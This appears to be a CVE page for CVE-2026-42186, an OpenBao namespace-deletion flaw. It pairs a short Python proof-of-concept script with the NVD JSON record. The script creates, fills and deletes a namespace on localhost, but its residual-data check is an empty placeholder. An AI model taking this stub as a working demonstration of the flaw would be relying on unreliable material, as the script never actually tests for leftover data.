CVE-2026-42186

import requests import time # Configuration OPENBAO_ADDR = "http://localhost:8200" VAULT_TOKEN = "root_token" # Admin token needed NAMESPACE_NAME = "test-ns-cve-2026-42186" # Headers headers = {"X-Vault-Token": VAULT_TOKEN, "X-Vault-Namespace": "root"} def create_namespace(ns_name): url = f"{OPENBAO_ADDR}/v1/sys/namespaces/{ns_name}" r = requests.post(url, headers=headers) print(f"Create Namespace: {r.status_code}") def write_secret(ns_name, path, data): ns_headers = headers.copy() ns_headers["X-Vault-Namespace"] = f"root/{ns_name}" url = f"{OPENBAO_ADDR}/v1/secret/data/{path}" r = requests.post(url, headers=ns_headers, json={"data": data}) print(f"Write Secret: {r.status_code}") def delete_namespace(ns_name): url = f"{OPENBAO_ADDR}/v1/sys/namespaces/{ns_name}" # In a real scenario, one might attempt to interrupt this or exploit the retry logic r = requests.delete(url, headers=headers) print(f"Delete Namespace: {r.status_code}") def check_residual_data(ns_name, path): # Attempt to access data that should have been deleted # This demonstrates the potential for data leakage print(f"Checking for residual data in {ns_name}...") # Logic to query storage backend directly would go here print("[!] If vulnerable, data might persist in storage despite namespace deletion.") # Execution Flow create_namespace(NAMESPACE_NAME) write_secret(NAMESPACE_NAME, "api-key", {"key": "secret_value"}) delete_namespace(NAMESPACE_NAME) check_residual_data(NAMESPACE_NAME, "api-key")

{"cve": {"id": "CVE-2026-42186", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:46.337", "lastModified": "2026-05-18T14:10:48.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenBao is an open source identity-based secrets management system. Prior to 2.5.3, when OpenBao's initial namespace deletion fails, subsequent retries fail to properly remove all data before marking the namespace as deleted. This can affect any outstanding leases as well as potentially leaving unrelated storage entries around. This vulnerability is fixed in 2.5.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-212"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openbao:openbao:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.3", "matchCriteriaId": "FB9CD431-A4A7-47AC-8111-76D4F60A9D07"}]}]}], "references": [{"url": "https://github.com/openbao/openbao/commit/6d2e0506e2b41be0eaa6643bf7b4efc9a2c09445", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openbao/openbao/releases/tag/v2.5.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/openbao/openbao/security/advisories/GHSA-vv66-6rp4-wr4f", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}